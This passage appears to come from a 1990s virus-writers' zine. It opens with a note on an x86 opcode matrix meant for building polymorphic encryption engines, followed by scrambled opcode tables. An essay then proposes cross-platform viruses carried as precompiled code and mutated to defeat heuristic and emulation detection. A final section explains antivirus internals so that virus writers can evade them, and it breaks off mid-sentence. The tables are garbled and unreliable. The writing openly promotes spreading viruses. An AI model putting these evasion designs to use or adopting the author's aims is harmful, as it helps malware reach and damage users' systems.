Guys forced me to publish a matrix which I used to create some predictive polymorhical encryption engine (based on emm3 ideas). Because MGL's matrix published in our zine #1 was really poor I created a better one, including 386+ opcodes of course. However this matrix presented here is also quite obsolette, and I started to build up a new one some weeks ago, but Katmai and Athlon specific opcodes overlaps a lot, so it tooks me more than a week to get rid of it and after that I accidentaly deleted what was already done. And you can imagine - I was so angry so I didn't started again :)
To use this matrix, you should at first install a true-type fonts (supplied) which I used in these excel sheets: using control panel - fonts - file - install new fonts. And you can print it as big as you wish, and start marking opcodes and groups you need to optimize your engine :) Good luck! Flush Download opcode matrix here
Opcodes x86 x0
x1
x2
x3
x4
x5
0x
ADD r/m, r8
ADD r/m, r
ADD r8, r/m
ADD r, r/m
ADD AL, im8
ADD AX, im
x6
x7
x8
x9
xA
xB
xC
xD
PUSH
POP
OR r/m, r8
OR r/m, r
OR r8, r/m
OR r, r/m
OR AL, im8
OR AX, im
1x
ADC r/m, r8
ADC r/m, r
ADC r8, r/m
ADC r, r/m
ADC AL, im8
ADC AX, im
AND r/m, r8
AND r/m, r
AND r8, r/m
AND r, r/m
AND AL, im8
AND AX, im
ES:
XOR r/m, r8
XOR r/m, r
XOR r8, r/m
XOR r, r/m
XOR AL, im8
XOR AX, im
SS:
xE CS
POP
SBB r/m, r8
SBB r/m, r
SBB r8, r/m
SBB r, r/m
SBB AL, im8
SBB AX, im
DS
SUB r/m, r8
SUB r/m, r
SUB r8, r/m
SUB r, r/m
SUB AL, im8
SUB AX, im
CS:
CMP r/m, r8
CMP r/m, r
CMP r8, r/m
CMP r, r/m
CMP AL, im8
CMP AX, im
DS:
xF 1)
2x 3x 4x
INC
INC
AX
5x
INC
CX PUSH
6x
PUSHA
7x
POPA POPAD r,
JO rel8
BX BOUND m
JNO rel8
PUSH
JNC rel8
DAA
AAA
prefix
INC
INC
SI PUSH
DEC
DI POP 386+
FS:
GS:
ofs 16/32
oper 16/32
prefix
prefix
prefix
prefix
JZ rel8
JNZ rel8
JA
PUSH
JNA
rel8
rel8
JS
table 2.1
table 2.2
table 2.3
table 2.4
TEST r/m, r8
TEST r/m, r
XCHG r/m, r8
XCHG r/m, r
MOV r/m, r8
NOP XCHG xchg ax, ax AX, CX
XCHG AX, DX
XCHG AX, BX
XCHG AX, SP
XCHG AX, BP
XCHG AX, SI
XCHG AX, DI
CBW
Ax
MOV AL, [adr]
MOV AX, [adr]
MOV [adr], AL
MOV [adr], AX
CMPS
TEST AL, im8
Bx
MOV AL, im8
MOV CL, im8
MOV DL, im8
MOV BL, im8
table 2.8 r/m, im8
Dx Ex
JP
rel8
r8/m8, sim8 r/m, sim8
Cx
JNS
rel8
IMUL r, i8, m
POP
table 2.12
r/m, im
table 2.9 r/m, im8
table 2.13
RETN
MOVSB
MOV AH, im8
MOV CH, im8
M
M
RETN
im8
table 2.14
MOVS
LES r, m
! 2)
! 2)
table 2.14
AAM
r8/m8, 1
r/m, 1
r8/m8, CL
r/m, CL
im8
LOOPNZ rel8
LOOPZ rel8
LOOP rel8
JCXZ IN rel8 JECXZ AL, im8
MOV DH, im8
MOV BH, im8
table 2.10 LDS
r, m
CMPSB
MOV m, im8
AAD
SETALC
IN AX, im8
OUT im8, AL
CWD
JL
JNL
JG
OUT im8, AX
LEA
PUSHF
STOS
MOV DX, im
POPF
LODS
MOV SP, im
table 2.7 m
SAHF
LAHF
SCASB
SCAS
POPFD
LODSB
MOV BX, im
rel8
MOV seg, r/m
r, m
PUSHFD
STOSB
JNG
rel8
table 2.6
MOV r/m, seg
WAIT
186+
OUTS
MOV BP, im
MOV SI, im
MOV DI, im
186+
LEAVE
RETF
RETF
INT 3
INT
imm x87
XLAT
CALL far
MOV CX, im 186+
ENTER im, im8
MOV r, r/m
DI 186+
OUTSB
rel8
CDQ adr
TEST AX, im
MOV AX, im
286+
im8
MOV r8, r/m
CWDE
table 2.11 MOV m, im
MOV r/m, r
POP
SI 186+
INS
rel8
DEC DI
POP BP
INSB
rel8
DEC
186+
JNP
rel8
AAS
prefix
table 2.5 r8/m8, im8
9x
PUSH im8
DAS
prefix
SI
POP 186+
POP DS
DEC
SP
186+
PUSH
BP
POP BX
186+
IMUL r, i, m
DEC SP
POP DX
186+
im
DEC BX
POP CX
AX
386+
DEC DX
POP
DI
386+
DEC CX
AX
PUSH SI
386+
ARPL r, m
SS
prefix
BP
P286+
JC rel8
SS
BP
SP
186+
ES PUSH
INC
SP PUSH
DX 186+
PUSHAD
8x
PUSH
CX 186+
INC
BX
PUSH
AX
INC
DX
ES
table 1
PUSH
INTO
IRET
im8
x87
x87
x87
x87
x87
x87
x87
ESC0 m32/fr
ESC1 m32/fr
ESC2 m32/(r8?)
ESC3 m32/(r?)
ESC4 m64/fr
ESC5 m64/fr
ESC6 m16/fr
ESC7 m16/(r?)
CALL near adr
JMP near adr
JMP far adr
JMP short rel8
IN AL, DX
IN AX, DX
OUT DX, AL
OUT DX, AX
table 3.1
Fx
LOCK
…
REPNZ
REP
prefix
prefix
prefix
HLT
CMC
table 2.16 m8, (im8)
table 2.17 m, (im)
USED Symbols: im, im8 - Immediate number, in current operand size 16/32, or 8 bit sim, sim8 - Signed immediate number 16/32, 8 bit r/m - Register or memory see R/M microcode table r, r8 - Register see Register microcode table m, m8 - Memory mode [adr] - Fixed address location (imm) rel8 - Relative address (sim8, based from next instruction) adr - Fixed address (imm) seg - Segment register 1) - 8088 POP CS: 2) - Documented only with im8 = 0Ah, on NEC only this variant is implemented A - AX variant is not used by compilers (shorter form is available too) ! - Undocumented instruction / not used by compilers M - Operand is actually r/m type, but is invalid with R variant
Instruction legality / note / warning
A! 2)
Operand list with its size
im8
386+
INSTR prefix
CPU limitation Instruction mnemonic
JCXZ
Optional instruction modification, usualy with 66-prefix (not mentioned in string instructions)
Is a prefix, not a instruction
CLC
STC
CLI
STI
CLD
STD
table 2.18 m8
table 2.19 m
Register microcode table (reg) 0
1
2
3
4
5
6
7
8 bit
AL
CL
DL
BL
AH
CH
DH
BH
16/32 bit
(E)AX
(E)CX
(E)DX
(E)BX
(E)BP
(E)SP
(E)SI
(E)DI
segments
ES
CS
SS
DS
FS
GS
-
-
Postbyte XXxx xxxx
mod
xxXX Xxxx
reg OR instructi on
SIB
xxxx xXXX
XXxx xxxx
xxXX Xxxx
xxxx xXXX
r/m
scale
index
base
16-bit adressing modes (mod, r/m) 0 1
0
1
2
3
4
5
6
7
[BX+SI]
[BX+DI]
[BP+SI]
[BP+DI]
[SI]
[DI]
[im]
[BX]
[DI+sim8]
[BP+sim8]
[BX+sim8]
[SI+im]
[DI+im]
[BP+im]
[BX+im]
AH/BP
CH/SP
DH/SI
BH/DI
[BX+SI+sim8] [BX+DI+sim8] [BP+SI+sim8] [BP+DI+sim8] [SI+sim8]
2
[BX+SI+im] [BX+DI+im] [BP+SI+im] [BP+DI+im]
3
AL/AX
CL/CX
DL/DX
BL/BX
32-bit adressing modes (mod, r/m) 0 1
0
1
2
3
4
5
6
7
[EAX]
[ECX]
[EDX]
[EBX]
[SIB]
[im]
[ESI]
[EDI]
[EAX+sim8] [ECX+sim8] [EDX+sim8] [EBX+sim8] [SIB+sim8] [EBP+sim8] [ESI+sim8] [EDI+sim8]
2
[EAX+im]
[ECX+im]
[EDX+im]
[EBX+im]
[SIB+im]
[EBP+im]
[ESI+im]
[EDI+im]
3
AL/EAX
CL/ECX
DL/EDX
BL/EBX
AH/EBP
CH/ESP
DH/ESI
BH/EDI
SIB base MOD of postbyte
0
1
2
3
4
5
6
7
0
+EAX
+ECX
+EDX
+EBX
+ESP
+im
+ESI
+EDI
1
+EAX
+ECX
+EDX
+EBX
+ESP
+EBP+im8
+ESI
+EDI
2
+EAX
+ECX
+EDX
+EBX
+ESP
+EBP+im
+ESI
+EDI
Note: If MOD of postbyte is 11, SIB is not present at all!
SIB index 0
1
2
3
4
5
6
7
[EAX]
[ECX]
[EDX]
[EBX]
-
[EBP]
[ESI]
[EDI]
SIB scale 0
1
2
3
index
index * 2
index * 4
index * 8
Exdended "0F" Opcodes x0
x1 286+
0x
table 2.20
table 2.21 r/m
LAR r, m/m
LSL r, r/m
table 3.4
table 3.5
table 3.6
…
…
MOV r32, CRn
…
MOV r32, DRn
MOV CRn, r32
3x
WRMSR
CMOVO r, m
5x
-
6x
RDMSR
SET1 r8/m8, CL 386+
SET1 r/m, CL
8x
JO
-
CMOVNC r, m
-
CMOVZ r, m
CMOVNZ r, m
FS CMPXCHG r/m, r8
r/m
Cx
XADD r/m, r8
486+ B1+ step M
486+
NEC V33/V53
Ex
BRKXA im8 NEC V33/V53
Fx
RETXA im8
MMX
PSRAW mm, mm/m64 MMX
PSLLW mm, mm/m64
xE
xF
-
-
-
-
NEC V20+
NEC V20+
NEC V20+
NEC V20+
CLEAR1 r/m, im
SET1 r/m, im8
SET1 r/m, im
NOT1 r/m, im8
NOT1 r/m, im
ROR4
-
-
-
-
-
m8
386+
LSS
386+ M
BTR r/m, r
r, m
386+ M
r, m
r, m -
-
-
MMX
PSRLD mm, mm/m64
MMX
PSRLQ mm, mm/m64
PMULLW mm, mm/m64
-
PMULHW mm, mm/m64
-
PMADDWD mm, mm/m64
MMX
-
MMX
PSLLD mm, mm/m64
MMX
PSLLQ mm, mm/m64
USED Symbols: im, im8 - Immediate number, in current operand size 16/32, or 8 bit sim, sim8 - Signed immediate number 16/32, 8 bit r/m - Register or memory see R/M microcode table mm - MMX register r, r8 - Register see Register microcode table m, m8 - Memory mode [adr] - Fixed address location (imm) rel8 - Relative address (sim8, based from next instruction) rel - Relative address (sim16/32, based from next instruction) adr - Fixed address (imm) seg - Segment register ! - Undocumented instruction / not used by compilers M - Operand is actually r/m type, but is invalid with R variant
table 2.29 m, im8
486+
AX PSUBUSB mm, mm/m64
-
-
PSUBSB mm, mm/m64
-
-
PSUBB mm, mm/m64
MMX
MMX
DX
PAND mm, mm/m64
-
POR mm, mm/m64
MMX
PSUBSW mm, mm/m64 MMX
PSUBW mm, mm/m64
MMX
MMX
PSUBD mm, mm/m64
MMX
PADDSB mm, mm/m64 PADDB mm, mm/m64
IMUL r, r/m 386+
MOVSX r, r8/m8 486+
386+
MOVSX r, r16/m16
486+
486+
BSWAP
SP MMX
PADDUSB mm, mm/m64
MMX
-
386+
BSWAP
BP MMX
-
r/m -
386+
BSWAP
BX
MMX
PSUBUSW mm, mm/m64
r/m
BSR r/m, r 486+
BSWAP
386+
SETNG
386+
386+
BSF r/m, r 486+
BSWAP
CX MMX
-
386+
rel 386+
SETG
r/m 386+
386+
JNG
rel 386+
SHRD SHRD r/m, r, im8 r/m, r, CL
BTC r/m, r
486+
BSWAP
-
MMX
486+
BSWAP
386+
SETNL
r/m
MMX
MOVQ mm/m64, mm
JG
rel 386+
386+
386+
table 2.30
MMX
PSRAD mm, mm/m64
-
GS -
386+
SETL
BTS r/m, r
MMX
MOVQ mm, mm/m64
MOVD r/m32, mm
JNL
rel
r/m
386+
MOVZX r, r16/m16
m80
386+
486+
RSM
-
486 table 3.12 MMX
table 2.28
386+
SETNP
r/m
P6+
CMOVNG r, m
MOVD mm, r/m32
486
table 2.27 JL
rel
POP
CMOVG r, m -
-
m80
386+
386+
-
386+
SETP
r/m
CMOVNL r, m
MMX
JNP
rel
386+
PUSH GS
m80
386+
P6+
-
486
386+
SETNS
r/m
MMX
-
CMOVL r, m -
table 2.26
JP
rel 386+
P5+
-
m80
386+
P6+
MMX
486
table 2.25
P6+
-
486
SETS
CMPXCHG r/m, r
386+
MOVZX r, r8/m8
CMOVNP r, m
MMX
JNS
rel 386+
r/m
386+
LGS
P6+
-
RSDC sreg, m80
386+
386+ table 3.13 486 B0- table 3.14 486 B0-
LFS
CMOVP r, m
MMX
486
SETNA
CMPXCHG r/m, r8
P6+
-
JS
rel 386+
r/m
CMOVNS r, m
SVDC m80, sreg 386+
SETA
SHLD SHLD r/m, r, im8 r/m, r, CL
P6+
MMX
JNA
rel
386+
CMOVS r, m
MMX
EMSS
386+
386+
-
-
MMX
m64
PSRLW mm, mm/m64
NEC V20+
PACKUSWB PUNPCKHBW PUNPCKHWD PUNPCKHDQ PACKSSDW mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64
PCMPEQD mm, mm/m64
SETNZ r/m
386+
BT r/m, r
MMX
Dx
-
MMX
486+
XADD r/m, r
UD2
NEC V20+
CLEAR1 r/m, im8
P6+
-
JA
rel 386+
r/m
SL, P5+
CPUID
CMOVNA r, m
PCMPGTD mm, mm/m64
386+
SETZ
r/m
386+
CMPXCHG r/m, r
xD
NEC V20+
-
MMX
JNZ
rel 386+
CMOVA r, m
MMX
PCMPEQW mm, mm/m64
386+
SETNC
FS
486+ B1+ step
TEST1 r/m, im
P6+
-
PCMPGTW mm, mm/m64
JZ
rel 386+
POP
Bx
-
NEC V20+
ROL4 r8/m8
-
MMX
MMX
386+
SETC
r/m 386+
xC P6+
WBINVD
NEC V20+
TEST1 r/m, im8
P6+
-
PCMPEQB mm, mm/m64
JNC
rel 386+
PUSH
mm, im8 386+
SETNO
r/m
xB
486
NEC V20+
-
MMX
MMX
table 2.24
JC
rel 386+
Ax
mm, im8 386+
SETO
NOT1 r/m, CL -
P6+
MMX
MMX
table 2.23
JNO
rel
9x
INVD
NEC V20+
MOV TRn, r32
P6+
MMX
table 2.22 mm, im8
xA
x9 486 !
…
NEC V20+
NOT1 r8/m8, CL
-
P6+
MMX
386+
x8 !
table 3.9 386, 486
MOV r32, TRn
RDMPC r8, r8
CMOVC r, m
MMX
-
CLTS
NEC V20+
386, 486
PUNPCKLBW PUNPCKLWD PUNPCKLDQ PACKSSWB PCMPGTB mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64 mm, mm/m64
7x
LOADALL
NEC V20+
P6+
MMX
x7 286+ table 3.2
alternative
MOV DRn, r32
P6+
CMOVNO r, m
x6 286
SLC, P5+ table 3.11 P6+
RDTSC r8, r8 P6+
x5 286 !
LOADALL
…
386+ table 3.8 386+
SLC, P5+ table 3.10 P5+
x4 286+ !
table 3.3
table 3.7 386+
4x
x3 286+
r/m
1x 2x
x2 286+
BSWAP
SI
DI
MMX
PADDUSW mm, mm/m64
MMX
-
PANDN mm, mm/m64
-
PXOR mm, mm/m64
MMX
PADDSW mm, mm/m64 MMX
PADDW mm, mm/m64
MMX
MMX table 3.15
PADDD mm, mm/m64
…
Table 2 - extended opcodes 00 80 table 2.1
81 table 2.2
82 table 2.3
83 table 2.4
08
000
10
001
18
010
20
011
28
100
8C 8E
A
A
A
A
A
ADC r8/m8, im8
SBB r8/m8, im8
AND r8/m8, im8
SUB r8/m8, im8
XOR r8/m8, im8
CMP r8/m8, im8
A
A
A
A
A
A
A
A
ADD r/m, im
OR r/m, im
ADC r/m, im
SBB r/m, im
AND r/m, im
SUB r/m, im
XOR r/m, im
A!
A!
A!
A!
??? A !
??? A !
386+ A
A
A
ADD r/m, sim8
OR r/m, sim8
MOV r/m, ES
ADC r/m, sim8
MOV r/m, CS
386+ A
A
A
SBB r/m, sim8
AND r/m, sim8
C0
C6 table 2.10
C7 table 2.11
MOV r/m, DS
MOV r/m, FS
MOV r/m, GS 386+
MOV SS, r/m
MOV DS, r/m
MOV FS, r/m
MOV GS, r/m
R!
R!
R!
R!
R!
POP
POP
r/m
ROL r8/m8, im8
POP
r/m
ROR r8/m8, im8
RCL r8/m8, im8
186+
RCR r8/m8, im8
186+
186+
POP
r/m
186+
SHL r8/m8, im8
R!
POP
r/m
186+
-
-
POP
r/m
186+
-
R!
POP
r/m
186+
CMP r/m, sim8
386+
MOV CS, r/m
POP
XOR r/m, sim8
386+
R
r/m
386+ A
A
SUB r/m, sim8
MOV ES, r/m
186+
C1 table 2.9
MOV r/m, SS 8088
186+
table 2.8
CMP r/m, im ??? A !
A!
ADD OR ADC SBB AND SUB XOR CMP r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8 r8/m8, sim8
8F table 2.7
111
A
OR r8/m8, im8
! table 2.6
38
110
A
ADD r8/m8, im8
386+
table 2.5
30
101
A
r/m
186+ !
SHR r8/m8, im8
186+
186+
SAL r8/m8, im8
186+ !
186+
SAR r8/m8, im8
186+
186+
ROL r/m, im8
ROR r/m, im8
RCL r/m, im8
RCR r/m, im8
SHL r/m, im8
SHR r/m, im8
SAL r/m, im8
SAR r/m, im8
R
R!
R!
R!
R!
R!
R!
R!
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
MOV r8/m8, im8
R
R!
R!
R!
R!
R!
R!
R!
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
MOV r/m, im
!
D0 table 2.12
ROL r8/m8, 1
ROR r8/m8, 1
RCL r8/m8, 1
RCR r8/m8, 1
SHL r8/m8, 1
SHR r8/m8, 1
SAL r8/m8, 1
SAR r8/m8, 1
!
D1 table 2.13
ROL r/m, 1
ROR r/m, 1
RCL r/m, 1
RCR r/m, 1
SHL r/m, 1
SHR r/m, 1
SAL r/m, 1
SAR r/m, 1
!
D2 table 2.14
ROL r8/m8, CL
ROR r8/m8, CL
RCL r8/m8, CL
RCR r8/m8, CL
SHL r8/m8, CL
SHR r8/m8, CL
SAL r8/m8, CL
SAR r8/m8, CL
!
D3 table 2.15
F6 table 2.16
F7 table 2.17
FE table 2.18
ROL r/m, CL TEST r8/m8, im8
-
TEST r/m, im INC r8/m8
DEC r8/m8
R
R
INC
table 2.21
SAL r/m, CL
SAR r/m, CL
NOT r8/m8
NEG r8/m8
MUL r8/m8
IMUL r8/m8
DIV r8/m8
IDIV r8/m8
NEG
SGDT
-
CALL far m
SIDT
LGDT
r/m
r/m
-
PSRLW mm, im8
table 2.22
-
-
-
-
SMSW
286+ M
-
LMSW
r/m -
PSRAW mm, im8
MMX
-
PSLLW mm, im8
MMX
-
-
PSRAD mm, im8
-
PSRLQ mm, im8
table 2.24
-
PSLLD mm, im8
table 2.25
SVLDT
0F 7B
-
-
PSLLQ mm, im8
-
-
-
-
-
-
-
-
RSLDT
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
m80
0F 7C
486
SVTS m80 486
M
0F 7D table 2.28
-
486
M table 2.27
-
m80 M
table 2.26
MMX
486
M
0F 7A
MMX
MMX
0F 73
486
INVLPG r/m
r/m MMX
-
PSRLD mm, im8
table 2.23
PUSH r/m
286+
VERW
MMX
0F 72
-
286+
LIDT r/m
-
r/m
286+
MMX
0F 71
JMP far m
VERR r/m
r/m
R
286+
LTR r/m 286+ M
IDIV
r/m -
JMP near r/m
286+
LLDT r/m 286+ M
DIV
r/m
M
286+
STR r/m 286+ M
r/m
IMUL
r/m -
CALL near r/m 286+
SLDT
MUL
r/m -
r/m
r/m
0F 01
SHR r/m, CL
NOT
DEC
r/m
M
SHL r/m, CL
M
286+
table 2.20
RCR r/m, CL
r/m R
0F 00
RCL r/m, CL
-
R
FF table 2.19
ROR r/m, CL
RSTS
-
-
-
m80 386+
0F BA
-
-
-
CMPXCHG8B m64
-
-
-
-
table 2.29
BT r/m, im8
386+
BTS r/m, im8
386+
BTR r/m, im8
386+
BTC r/m, im8
P5+
0F C7 table 2.30
USED Symbols: im, im8 - Immediate number, in current operand size 16/32, or 8 bit sim, sim8 - Signed immediate number 16/32, 8 bit r/m - Register or memory see R/M microcode table mm - MMX register r, r8 - Register see Register microcode table m, m8 - Memory mode [adr] - Fixed address location (imm) rel8 - Relative address (sim8, based from next instruction) adr - Fixed address (imm) seg - Segment register A - AX variant is not used by compilers (shorter form is available too) ! - Undocumented instruction / not used by compilers R - A shorter form of instruction exits for register as an operand M - Operand is actually r/m type, but is invalid with R variant
-
-
-
-
Table 3 - CPU-depended instructions NEC V20+
IBM 486SLC2
INTEL 386
INTEL 486
INTEL P5
INTEL P6
CYRIX 486
CYRIX 5x86
CYRIX 6x86
AMD 386SX/DX
AMD 486
AMD K5
AMD K6
BRKS
ICEBP
-
-
-
-
SMI?
SMI?
SMI?
SMI
SMI
?
?
-
ICERET
LOADALL
LOADALL
-
-
?
?
?
RES3
RES4
?
?
V25/V35
F1 table 3.1
im8
0F 07 table 3.2
0F 10 table 3.3
0F 11 table 3.4
0F 12 table 3.5
0F 13 table 3.6
TEST1 r8/m8, CL
UMOV r/m, r8
?
?
-
-
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
UMOV r/m, r8
?
?
TEST1 r/m, CL
UMOV r/m, r
?
?
-
-
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
UMOV r/m, r
?
?
CLEAR1 r8/m8, CL
UMOV r8, r/m
?
?
-
-
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
UMOV r8, r/m
?
?
CLEAR1 r/m, CL
UMOV r, r/m
?
?
-
-
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
UMOV r, r/m
?
?
0F 20
ADD4S
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
MOV r32, CRn
SUB4S
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV CRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
MOV TRn, r32
?
RDTSC r8, r8
?
table 3.7
0F 22 table 3.8
0F 28 table 3.9
0F 31 table 3.10
0F 33 table 3.11
ROL4 r8/m8 INS r8, r8
-
-
-
EXT r8, r8
-
-
-
-
-
RDTSC r8, r8
RDTSC r8, r8
-
RDMPC MMX
0F 33
-
SMINT
-
-
table 3.12
0F A6
table 3.15
-
-
-
-
-
-
-
-
-
-
SMINT
-
-
-
-
-
-
MMX
MOVD r/m32, mm
MOVD r/m32, mm
MMX
MOVD r/m32, mm
CMPXCHG r/m, r8
XBTS CMPXCHG r, r/m, EAX, r/m, CL r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
XBTS CMPXCHG r, r/m, EAX, r/m, CL r8
CMPXCHG r/m, r8
CMPXCHG r/m, r8
-
CMPXCHG r/m, r
IBTS CMPXCHG r, r/m, EAX, r/m, CL r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
CMPXCHG r/m, r
IBTS CMPXCHG r, r/m, EAX, r/m, CL r
CMPXCHG r/m, r
CMPXCHG r/m, r
table 3.14
0F FF
-
-
table 3.13
0F A7
?
BRKEM im8
-
-
-
USED Symbols: im, im8 - Immediate number, in current operand size 16/32, or 8 bit sim, sim8 - Signed immediate number 16/32, 8 bit r/m - Register or memory see R/M microcode table r, r8 - Register see Register microcode table m, m8 - Memory mode [adr] - Fixed address location (imm) rel8 - Relative address (sim8, based from next instruction) adr - Fixed address (imm) seg - Segment register
-
-
-
-
OIO
-
-
UD
UD?
Introduction If we can handle such a complexe target as PE files are we are facing the sad fact we can infect files on the Intel platform but we can never get outside this platform. Rare exception from this axiom is virus Esperanto (by Mr. Sandman published in 29A Nr. 2) which is the first of its kind, capable of speading on various platforms and processors. Glory goes to Mr. Sandman but unfortunately, this approach cannot be used for larger projects. Whole Esperanto's solution is based on presence of two parts - one for intel processors, the other for Macs, practically doubling the size of necessary code. It doesn't seem to be the ideal solution, let's image the 50 kB viral code for three processors and we well land somewhere around 150 kb maxivirus.
Idea I would solve this problem using another approach. My approach would be more difficult (but not impossible) to code. I state here i am not ready to participate on such a project (no time and morale left). I would like to find some newbies or people ready to work hard. Idea is quite simple - we should carry the body in some kind of pre-compiled state, which should be easy translated to assembly language of every single target processor. Imagine, we have C compilator, which produces output at the level between C and assembly languages. Between C and assembly means, that before code is assembled it has to be compiled by special C compiler. In fact code should be at the lowest level, it could be, because we need to assemble it for various architectures. Because of this code should be register and memory addressing mode independent. The one model i like the best is stack machine (uses RPL - reverse polish logic) with direct memory adressing mode (only value on top of the stack is a memory address). Of course, this means compiled "code" will be larger than regular intel code. Resulting code for some processor could gain quite high variability this way (by every single translation could be another instructions or registers used). Also in the case resulting code will be close enough to code produced by C compilers - some standart stack frame, analogical using of stack, registers, variables and so on - this would be very hard to differenciate by heuristics without any further analysis. And it will be even harder (if not impossible) to distinguish between variants. This would make problem of use complicated (and unemulationable) polymorphic routines, decryptors and such a things redundant. The only one condition to be not a simple target is to have the "source" (which is by its nature more or less static) encoded and decode it only if need to replicate. Of course, precompiled "source code" has to contain "assembler" for all supported processors. Assembler as a heart of body - gives a virus it's variability and complexness, so detection is as hard as good is assembler. That's reason why virii can be very long. It will be not enough just 5kB like for a classic poly routines. That is reason why (probably) wouldn't be such a viruses spreaded by mailing. But besides of this code will be very similar to standart languages. You needn't to deal with infecting file in general, you can link your data area wherever you need so you need not to use writeable sections for code - what is in my opinion the strongest heuristic flag.
Real time compiling Anoter posibility is compile code at run-time - you needn't to have whole code compiled in host file. You can compile it at time you need it. This may at least reduce a size the file is increased of. I am not sure if this is safe enough in order not to be visible but i think compilation is complex enough to slow emulation down, and may be makes scanning-speed unacceptable, so avers will have to find out new ways of detecting.
Code morphing Another advantage is the BIG possibility of some modifications to the pre-compiled code. Because you exactly know what your code means and what kind of modifications can be performed on it. Because new one inherits it's code by parent, in 10 generations there can be a very big difference between existing variants. Just imagine block permutations (modules or just functions) and minor changes in code like c=a+b > c=b+a. I think it is good enough to totaly change the look of virii from parent to child and not speaking even about differences between distant variants. And there are possible a bit more complex changes - of course it depends on source language and you.
Disadvantages - size As i see it, main disadvantage is size. Because of a bit difficult technologies necessary to implement i don't even hope that resulting code will be smaller than 50kB, what is imho a bit problem in these days. At first you can't use mailing strategy to spread itself. It tooks some time to download 150kB of mails :-(. I heard that 300kB is nothing, and there are really coming medias with 100MBs throughput, but main limiting factor is floppy disk/internet and we still live in world, where 3kB/s is a high speed (33k6 modems are quite usual for use of internet from home). There can be some problems on the interference level (level, where host file and virus are directly connected). We are not far enough to say it can be whole handled by compiler or in needs special handling with PE+platform dependend code. But it should not be a big problem.
And now some sci-fi: Probably the first reason we start with all this stuff was to try how will genetics work in vx. And this gives you much better control over code modularision and generation of code. Our first idea was to create virii able to exchange modules with other one in order to optimize itself and adapt to current environment. This gives you much better probability to survive, but need to create environment with strong exchange of genes - what is difficult. And now to real world ...
Closing And now some closing words. Main advantage of the pre-compiled code is possibility to cross-plastform infection. Besides this this approach opens another horizonts at least at the level of today poly engines and in the eternal 'game of hiding body' goes more to the direction of giving the virus body 'right color' than building 'bullet-proof' walls of anti code. This leads in no way to the lower variability of the code. Having this features this concept leads to the viruses which are TMC-like. Another plus is the programming in HLL is more comfortable and faster, read more effective, not speaking of the base address independency :-). Think about it !
One can give a simplest answer: "Know your enemy!". However it is not so simple. Well, I have taken control on one of our big tours aimed to antiviruses, so I have to answer. Who else can? How you can write an virus without understanding antiviruses? With a very poor effeciency. The bad but common atribute of virus writers is that they do not know, how does avirs works. Most of writers call themselfs researchers, but in many cases they are not researching anything. Just writing some virii simmilar one to another. Think a bit - it slightly simplyfies work for antivirus guys. They have no aditional effort to cover new viruses. It is, in other words, schematic. New viruses can be covered within a minutes (or even seconds! depends how wise they are and tools they wrote to do so) - it of course depends when they will do it and it may takes them up to days or month(s) if they are overloaded with new samples. But no extra work to catch all the samples in In-the-Wild set and get Virus Bulletin's 100% award. And i think you will not be happy to be caught so easily.
This tour is oriented to explain you how antiviruses works, lists basic principles and theory of scanning (and cleaning as well) methods, partially appoint how some best antiviruses works (and some our comments to they hit-rates). We will also try to put some valid tests we made on real samples to show you this theories. We are not going you to tell exact methods how to fool each antivirus, but to show you what way you must think, and how to find newer and newer methods how to fool them. As if we list ten methods for example, if all of them will be used there is no other method available. Of course, we will try to show some basic directions, but you have to think! As writing virii is not for lamers. Not any more. Only best can survive. Think as it is YOU, for a while.
Virus is as good as long it can survive. Some virus writers are writing their work for "research reasons" just putting it into some collections, spreading between avers, but no more. Well, one may guess it is ethical. At first I have to say - the most unethical thing associated with viruses is destruction. Never do that. You don't have any reasons to do so. The else what left - is the virii principle itself - to spread and be spreaded. There is nothing inbetween. I can illustrate it on Uruguay virus family. Don't you know 'em? They are pretty known: originally, whole family (as far as I know the latest is number 11) was written as some research virus to illustrate technologies. Polymorphic technologies, of course. Their author, named Brueiurere didn't (as far as it is known) supposed them for real spreading - only for avers and to complicate their life a bit. Samples were available for avresearchers, later on only for some selected avers - they obtain samples with important note not to spread them. As the avers a biggest virus-exchangers in the world soon most of them has those samples. Someone of them even put uruguay#6 into real enviroment and this virus (only avers had it!) was detected in the wild. This is classical example that also avers can spread viruses - even if they are saying they are a good guys. But world is never black and white. Later on, uruguay's author was producing some newer versions: up version #8 almost every aver have. Version #10 and #11 were given only to two peoples in the world Ilja Gulfakov (dr.web) and xaefer (avp?). Are uruguays ethical? I don't think so - they are same viruses as other ones, but it complicates life to avers and they don't want to spread them as they can hardly detect them. I return back to the original idea - how long virus can survive. Sooner or later any virus can be detected (and removed as well) unless we can change the current virii principle - but it is a another long discussion. For
